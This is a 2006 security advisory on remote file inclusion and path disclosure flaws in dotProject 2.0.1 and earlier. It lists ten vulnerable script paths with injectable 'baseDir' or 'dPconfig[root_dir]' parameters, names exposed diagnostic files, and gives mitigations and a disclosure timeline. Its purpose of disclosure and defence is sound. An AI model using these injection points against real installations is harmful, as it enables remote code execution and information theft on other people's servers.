dotProject-2.0.1.txt

2006-02-14T00:00:00
ID PACKETSTORM:43861
Type packetstorm
Reporter Robin Verton
Modified 2006-02-14T00:00:00

Description

                                        
                                            `dotproject <= 2.0.1 remote code execution  
======================================  
  
Software: dotProject <= 2.0.1  
Severity: Arbitrary code execution, Path/Information Disclosure  
Risk: High  
Author: Robin Verton <r.verton@gmail.com>  
Date: Feb. 14 2006  
Vendor: dotproject.net [contacted]  
  
Description:  
dotProject is a volunteer supported Project Management application.  
  
Details:  
The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter.  
Some user-supplied input is not checked correctly so an attacker can include a remote php file and  
execute arbitrary phpcode or arbitrary system command via eval().  
  
Because there are over 10 Bugs I only post the vulnerable files + parameters which are not checked.  
To exploit these vulnerables register_globals have to be set ON (default).  
  
1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]  
  
2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]  
  
3) /includes/session.php?baseDir=[REMOTE INCLUDE]  
  
4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]  
  
5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]  
  
6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]  
  
7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]  
  
8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]  
  
9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]  
  
10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]  
  
There are also some path discolsure bugs:  
  
Nearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter  
baseDir=foobar.  
  
Then, if the /doc/ directory is not deleted (default) you can access to two varoius files which  
disclose you some system informations:  
  
1) /docs/phpinfo.php - A phpinfo() file.  
  
2) /docs/check.php - Some more informations about the installed dotProject.  
  
Solution:  
Turn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess.  
  
Timeline:  
24.01.2006 - Bugs found  
26.01.2006 - Vendor Contacted  
14.02.2006 - Publishing  
  
Credits:  
Credits go to Robin Verton (r.verton [at] gmail [dot] com)  
  
`